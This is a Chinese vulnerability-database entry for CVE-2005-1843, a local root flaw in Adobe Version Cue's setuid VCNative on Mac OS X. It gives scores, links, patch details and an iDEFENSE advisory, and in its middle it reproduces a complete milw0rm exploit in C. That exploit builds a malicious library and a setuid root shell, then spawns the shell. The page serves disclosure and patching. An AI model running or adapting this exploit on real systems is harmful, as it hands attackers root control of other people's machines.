CVE-2005-1843
CVSS4.6
发布时间 :2005-08-24 00:00:00
修订时间 :2008-09-05 16:50:14
NMCOEP    

[原文]VCNative for Adobe Version Cue 1.0 and 1.0.1, as used in Creative Suite 1.0 and 1.3, and when running on Mac OS X with Version Cue Workspace, allows local users to load arbitrary libraries and execute arbitrary code via the -lib command line argument.


[CNNVD]Adobe Version Cue for Mac OS X 权限提升漏洞(CNNVD-200508-283)

        Adobe Version Cue是Adobe Creative Suite中捆绑的为图像文件的编辑提供版本管理的工具。
        Adobe Version Cue for Mac OS X中存在两个权限提升漏洞: 第一个漏洞(CAN-2005-1842)允许本地攻击者通过VCNative应用程序以超级用户权限覆盖任意文件,导致权限提升。第二个漏洞(CAN-2005-1843)允许本地攻击者通过VCNative应用程序以超级用户权限加载任意函数库。这也会导致权限提升。 拥有本地Mac OS X帐号的用户可以利用这个漏洞获得对本地文件和应用程序的管理员访问。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:adobe:version_cue:1.0.1Adobe Version Cue 1.0.1
cpe:/a:adobe:version_cue:1.0Adobe Version Cue 1.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1843
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1843
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200508-283
(官方数据源) CNNVD

- 其它链接及资源

http://www.adobe.com/support/techdocs/327129.html
(VENDOR_ADVISORY)  CONFIRM  http://www.adobe.com/support/techdocs/327129.html
http://secunia.com/advisories/16541
(VENDOR_ADVISORY)  SECUNIA  16541
http://www.securityfocus.com/bid/14638
(UNKNOWN)  BID  14638
http://www.idefense.com/application/poi/display?id=296&type=vulnerabilities
(UNKNOWN)  IDEFENSE  20050829 Adobe Version Cue VCNative Arbitrary Library Loading Vulnerability
http://securitytracker.com/id?1014776
(UNKNOWN)  SECTRACK  1014776

- 漏洞信息

Adobe Version Cue for Mac OS X 权限提升漏洞
中危 设计错误
2005-08-24 00:00:00 2005-10-20 00:00:00
本地  
        Adobe Version Cue是Adobe Creative Suite中捆绑的为图像文件的编辑提供版本管理的工具。
        Adobe Version Cue for Mac OS X中存在两个权限提升漏洞: 第一个漏洞(CAN-2005-1842)允许本地攻击者通过VCNative应用程序以超级用户权限覆盖任意文件,导致权限提升。第二个漏洞(CAN-2005-1843)允许本地攻击者通过VCNative应用程序以超级用户权限加载任意函数库。这也会导致权限提升。 拥有本地Mac OS X帐号的用户可以利用这个漏洞获得对本地文件和应用程序的管理员访问。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.adobe.com/support/downloads/detail.jsp?ftpID=2985

- 漏洞信息 (1186)

Adobe Version Cue 1.0/1.0.1 (-lib) Local Root Exploit (OSX) (EDBID:1186)
osX local
2005-08-30 Verified
0 vade79
N/A [点击下载]
/*[ Adobe Version Cue VCNative[OSX]: local root exploit. (dyld) ]
* 
* by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) 
* 
* Adobe Version Cue's VCNative program allows un-privileged 
* local users to load arbitrary libraries("bundles") while 
* running setuid root. this is done via the "-lib" 
* command-line option. 
* 
* note: VCNative must connect to a valid host to be able 
* to get to the point where the library is loaded. this is 
* automated in this exploit by listening to an arbitrary local 
* port and using the localhost("127.0.0.1") to connect to. 
*****************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define VCNATIVE_PATH "/Applications/Adobe Version Cue/tomcat/webapps"\
"/ROOT/WEB-INF/components/com.adobe.bauhaus.nativecomm/res/VCNative"
#define VCNATIVE_PORT 7979
#define CC_PATH "/usr/bin/gcc"
#define BUNDLE_PATH "/tmp/xvcn_lib"
#define SUSH_PATH "/tmp/xvcn_sush"

void printe(char *,signed char);

int main(){
signed int sock=0,so=1;
char syscmd[4096+1];
struct stat mod;
struct sockaddr_in sa;
FILE *bundle,*sush;
/* banner. */
printf("[*] Adobe Version Cue VCNative[OSX]: local root exploit. (dy"
"ld)\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)\n\n");
/* see if we have what we need. */
if(access(CC_PATH,X_OK))
printe("incorrect gcc/cc path. (CC_PATH)",1);
if(stat(VCNATIVE_PATH,&mod))
printe("incorrect VCNative path. (VCNATIVE_PATH)",1);
if(!(S_ISUID&mod.st_mode))
printe("VCNative is not setuid. (VCNATIVE_PATH)",1);
/* appease VCNative's initial connection to load the library. */
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,(void *)&so,sizeof(so));
#ifdef SO_REUSEPORT
setsockopt(sock,SOL_SOCKET,SO_REUSEPORT,(void *)&so,sizeof(so));
#endif
sa.sin_family=AF_INET;
sa.sin_port=htons(VCNATIVE_PORT);
sa.sin_addr.s_addr=INADDR_ANY;
printf("[*] opening local port: %u.\n",VCNATIVE_PORT);
if(bind(sock,(struct sockaddr *)&sa,sizeof(sa))==-1)
printe("could not bind socket.",1);
listen(sock,1); 
/* make the bogus library/bundle. */
if(!(bundle=fopen(BUNDLE_PATH ".c","w")))
printe("could not write to bundle source file.",1);
fprintf(bundle,"void VCLibraryInit(){\n");
fprintf(bundle," seteuid(0);\n");
fprintf(bundle," setuid(0);\n");
fprintf(bundle," setegid(0);\n");
fprintf(bundle," setgid(0);\n");
fprintf(bundle," chown(\"" SUSH_PATH "\",0,0);\n");
fprintf(bundle," chmod(\"" SUSH_PATH "\",3145);\n");
fprintf(bundle,"}\n");
fprintf(bundle,"void VCLibraryExec(){}\n");
fprintf(bundle,"void VCLibraryExit(){}\n");
fclose(bundle);
/* make the (to-be) rootshell. */
if(!(sush=fopen(SUSH_PATH ".c","w")))
printe("could not write to sush/rootshell source file.",1);
fprintf(sush,"int main(){\n");
fprintf(sush," seteuid(0);\n");
fprintf(sush," setuid(0);\n");
fprintf(sush," setegid(0);\n");
fprintf(sush," setgid(0);\n");
fprintf(sush," execl(\"/bin/sh\",\"sh\",0);\n");
fprintf(sush,"}\n");
fclose(sush);
/* compile the bogus library/bundle. */
snprintf(syscmd,4096,"%s %s.c -bundle -o %s.bundle",CC_PATH,
BUNDLE_PATH,BUNDLE_PATH);
printf("[*] system: %s\n",syscmd);
system(syscmd);
/* compile the (to-be) rootshell. */
snprintf(syscmd,4096,"%s %s.c -o %s",CC_PATH,
SUSH_PATH,SUSH_PATH);
printf("[*] system: %s\n",syscmd);
system(syscmd);
/* run VCNative. (".bundle" is appended to the library path) */
snprintf(syscmd,4096,"\"%s\" -host 127.0.0.1 -port %u -lib %s",
VCNATIVE_PATH,VCNATIVE_PORT,BUNDLE_PATH);
printf("[*] system: %s\n",syscmd);
system(syscmd);
/* clean-up. */
unlink(BUNDLE_PATH ".c");
unlink(BUNDLE_PATH ".bundle");
unlink(SUSH_PATH ".c");
shutdown(sock,2);
close(sock);
/* check for success. */
if(stat(SUSH_PATH,&mod))
printe("sush/rootshell vanished? (SUSH_PATH)",1);
if(!(S_ISUID&mod.st_mode)||mod.st_uid){
unlink(SUSH_PATH);
printe("sush/rootshell is not setuid root, exploit failed.",1);
}
/* success. */
printf("[*] attempting to execute rootshell... (" SUSH_PATH ")\n\n");
system(SUSH_PATH);
exit(0);
}
/* all-purpose error/exit function. */
void printe(char *err,signed char e){
printf("[!] %s\n",err);
if(e)exit(e);
return;
}

// milw0rm.com [2005-08-30]
		

- 漏洞信息 (F39708)

iDEFENSE Security Advisory 2005-08-29.1 (PacketStormID:F39708)
2005-08-31 00:00:00
vade79,iDefense Labs  idefense.com
advisory,arbitrary,local,root
CVE-2005-1843
[点击下载]

iDEFENSE Security Advisory - Local exploitation of a design error in Adobe Systems, Inc. Version Cue allows local attackers to gain root privileges. Version Cue includes a setuid root application named VCNative which contains a design error that allows local attackers to gain root privileges. The vulnerability specifically exists due to an unchecked command line option parameter. The -lib command line option allows users to specify library bundles which allows for the introduction of arbitrary code in the context of a root owned process. The init function in a shared library is executed immediately upon loading. By utilizing the -lib argument to load a malicious library, local attackers can execute arbitrary code with root privileges.

Adobe Version Cue VCNative Arbitrary Library Loading Vulnerability

iDEFENSE Security Advisory 08.29.05
www.idefense.com/application/poi/display?id=296&type=vulnerabilities
August 29, 2005

I. BACKGROUND

Adobe Version Cue is a software version tracking system for Adobe 
products distributed with Adobe Creative Suite and select Adobe 
products. 

II. DESCRIPTION

Local exploitation of a design error in Adobe Systems, Inc. Version Cue 
allows local attackers to gain root privileges. Version Cue includes a
setuid root application named VCNative which contains a design error
that allows local attackers to gain root privileges. The vulnerability
specifically exists due to an unchecked command line option parameter.
The "-lib" command line option allows users to specify library
"bundles" which allows for the introduction of arbitrary code in the
context of a root owned process. The init function in a shared library
is executed immediately upon loading. By utilizing the "-lib" argument
to load a malicious library, local attackers can execute arbitrary code
with root privileges.

III. ANALYSIS

Successful exploitation allows local attackers to execute arbitrary 
code with root privileges. The attack method is trivial and requires no 
specialized exploit code or skill by the attacker. Simply compiling a 
shared library with malicious code is all that is required to gain 
control of the system.

It should be noted that VCNative must connect to a valid host before 
loading libraries. The vulnerability is not exposed if VCNative has not 
been configured with a proper host value. In addition, the 
vulnerability affects only the Apple OS X platform and is only 
installed with Adobe Creative Suite or other Adobe products.

IV. DETECTION

iDEFENSE Labs has confirmed the existence of this vulnerability in 
Adobe Version Cue version 1 on the Apple OS X platform.

V. WORKAROUND

As a workaround solution, remove the setuid bit from the VCNative 
binary and execute the application as a root user when necessary.

VI. VENDOR RESPONSE

Adobe Version Cue Update 2 which addresses this vulnerability, is
available for download at:

  http://www.adobe.com/support/downloads/detail.jsp?ftpID=2985

The vendor advisory for this vulnerability is located at:

  http://www.adobe.com/support/techdocs/327129.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-1843 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

06/27/2005 Initial vendor notification
06/27/2005 Initial vendor response
08/29/2005 Public disclosure

IX. CREDIT

vade79 (http://fakehalo.us) is credited with this discovery.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright (c) 2005 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
    

- 漏洞信息

18922
Adobe Version Cue VCNative Arbitrary Library Load Privilege Escalation
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-08-11 Unknow
2005-08-31 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站